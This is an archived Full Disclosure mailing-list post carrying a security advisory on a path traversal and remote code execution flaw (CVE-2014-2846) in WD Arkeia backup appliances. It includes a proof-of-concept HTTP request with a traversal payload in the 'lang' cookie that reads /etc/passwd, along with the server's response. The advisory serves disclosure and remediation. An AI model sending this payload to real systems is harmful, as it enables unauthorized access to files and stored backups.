lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Wed, 23 Apr 2014 11:16:18 +0300
From: SEC Consult Vulnerability Lab <>
To: <>
Subject: [FD] SEC Consult SA-20140423-0 :: Path Traversal/Remote Code
 Execution in WD Arkeia Network Backup Appliances

SEC Consult Vulnerability Lab Security Advisory < 20140423-0 >
              title: Path Traversal/Remote Code Execution
            product: WD Arkeia Virtual Appliance (AVA)
 vulnerable version: All Arkeia Network Backup releases (ASA/APA/AVA) since 7.0.3.
      fixed version: 10.2.9
         CVE number: CVE-2014-2846
             impact: critical
              found: 2014-03-05
                 by: M. Lucinskij
                     SEC Consult Vulnerability Lab

Vendor description:
"The WD Arkeia virtual appliance (AVA) for backup provides simple, reliable and
affordable data protection for enterprises seeking to optimize the benefits of
virtualization. The AVA offers all the features of the hardware appliance, but
permits you to use your own choice of hardware."


Business recommendation:
The identified path traversal vulnerability can be exploited by unauthenticated
remote attackers to gain unauthorized access to the WD Arkeia virtual appliance
and stored backup data.

SEC Consult recommends to restrict access to the web interface of the WD Arkeia
virtual appliance using a firewall until a comprehensive security
audit based on a security source code review has been performed and all
identified security deficiencies have been resolved by the affected vendor.

Vulnerability overview/description:
The WD Arkeia virtual appliance is affected by a path traversal vulnerability.
Path traversal enables attackers access to files and directories outside the
web root through relative file paths in the user input.

An unauthenticated remote attacker can exploit the identified vulnerability in
order to retrieve arbitrary files from the affected system and execute system

Proof of concept:
The path traversal vulnerability exists in the
/opt/arkeia/wui/htdocs/index.php script. The value of the "lang" cookie
is not properly checked before including a file using the PHP include()
function. Example of the request that demonstrates the vulnerability by
retrieving the contents of the /etc/passwd file:

POST /login/doLogin HTTP/1.0
Host: $host
Cookie: lang=aaa..././..././..././..././..././..././etc/passwd%00
Content-Length: 25
Content-Type: application/x-www-form-urlencoded


The response from the affected application:

HTTP/1.1 200 OK
Date: Wed, 05 Mar 2014 08:29:35 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Set-Cookie: PHPSESSID=2ga2peps9eak48ubnkvhf69n40; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: subaction=deleted; expires=Tue, 05-Mar-2013 08:29:34 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Charset: UTF-8
Content-Length: 1217
Connection: close
Content-Type: text/html; charset=UTF-8

ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
ldap:x:55:55:LDAP User:/var/lib/ldap:/sbin/nologin
dhcpd:x:177:177:DHCP server:/:/sbin/nologin
{"local":{"STATUS":["0"],"MESSAGE":["Error code 4, Bad password or

Furthermore, the identified vulnerability can be also exploited to
execute arbitrary PHP code/system commands by including files that
contain specially crafted user input.

Vulnerable / tested versions:
The vulnerability has been verified to exist in the 10.2.7 version of the WD
Arkeia virtual appliance.

According to the vendor all Arkeia Network Backup releases (ASA/APA/AVA) since
7.0.3 are affected.

Vendor contact timeline:
2014-03-13: Contacting vendor through
2014-03-14: Vendor confirms the vulnerability.
2014-03-17: Vendor provides a quick fix and a release schedule.
2014-04-21: Vendor releases a fixed version
2014-04-23: SEC Consult releases a coordinated security advisory.

Update to the most recent version (10.2.9) of Arkeia Network Backup.

More information can be found at:


Advisory URL:

SEC Consult Vulnerability Lab

SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius

Mooslackengasse 17, 1190 Vienna, Austria
Phone:   +43 1 8903043 0
Fax:     +43 1 8903043 15

Mail: research at sec-consult dot com

Interested to work with the experts of SEC Consult?
Write to

EOF M. Lucinskij / @2014

Sent through the Full Disclosure mailing list
Web Archives & RSS:

Powered by blists - more mailing lists